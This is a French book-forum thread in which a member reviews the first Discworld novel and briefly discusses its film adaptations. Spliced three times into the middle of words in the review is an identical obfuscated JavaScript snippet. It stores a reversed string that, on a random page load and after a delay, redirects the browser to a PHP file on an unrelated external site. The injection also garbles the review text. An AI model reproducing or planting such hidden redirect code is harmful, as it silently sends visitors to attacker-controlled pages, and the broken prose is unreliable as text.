Les annales du Disque-Monde

Pour discuter de vos livres favoris
Répondre
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Les annales du Disque-Monde

Message par yami627 »

Le Disque-Monde (titre original : Discworld) est un monde imaginaire de fantasy humoristique développé à partir de 1983 par l'écrivain britanique Terry Pratchett dans la suite de romans "Les Annales du Disque-monde" et adapté depuis sur divers supports.
La série de romans du Disque-monde comporte 37 volumes, dont la gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande majorité a été traduite en français, et un certain nombre d'ouvrages "hors-série".

J'ai choisi de vous parler plus particulièrement du tome 1 : La huitième couleur

Image

Résumés : Dans un monde en forme de disque porté par quatre éléphants debout sur
le dos d'une tortue voguant dans l'espace intersidéral, les choses sont
forcément un peu bizarres. La magie fuit de partout, vaguement
maîtrisée par des mages formés à l'université ; les Dieux jouent au
monopoly avec leurs administrés comme pions ; les villes sont
désordonnées et soumises à la loi du plus fort, t$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andis que les campagnes
sont pleines d'êtres aussi étranges que dangereux. Rincevent, mage
renvoyé de l'université avant d'avoir obtenu son diplôme, se débrouille
pour passer inaperçu au milieu de tout cela. Jusqu'au jour où son
destin se trouve lié à un petit homme enthousiaste venu d'un autre
continent : un touriste...

Mon avis : J'ai découvert le Disque-monde avec le film "le père porché" qui passait tous les ans à noël qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and j'étais petite et j'ai tout de suite accroché. J'ai enfin pus me payer plusieurs tome il y as quelques mois et j'ai lus le tome 1.
Il faut un peu de temps pour s'appropriée l'univers déjanté de Pratchett mais une fois fait, on plonge sans ménagement dans les paysages époustouflant du Disque-monde. Les personnages sont très attachants et drôle.
Mon petit coup de cœur va pour le personnages de la faucheuse qui, au fils des romans devient de plus en plus drôle et attachante.
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Les annales du Disque-Monde

Message par Septine Madrona »

Etonnament je n'ai jamais rien lu de Terry Pratchett.
Mais je me souviens avoir entendu ou vu cette saga quelque part.

En tout cas, l'histoire a l'air très drôle! ^^
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Les annales du Disque-Monde

Message par yami627 »

Ils ont sorti 2 films tirés de ses livres : La huitiéme couleur et le pere porché.

ce dernier passe souvent a noel, tu as du le voir je pense ^^

Image
Image
Répondre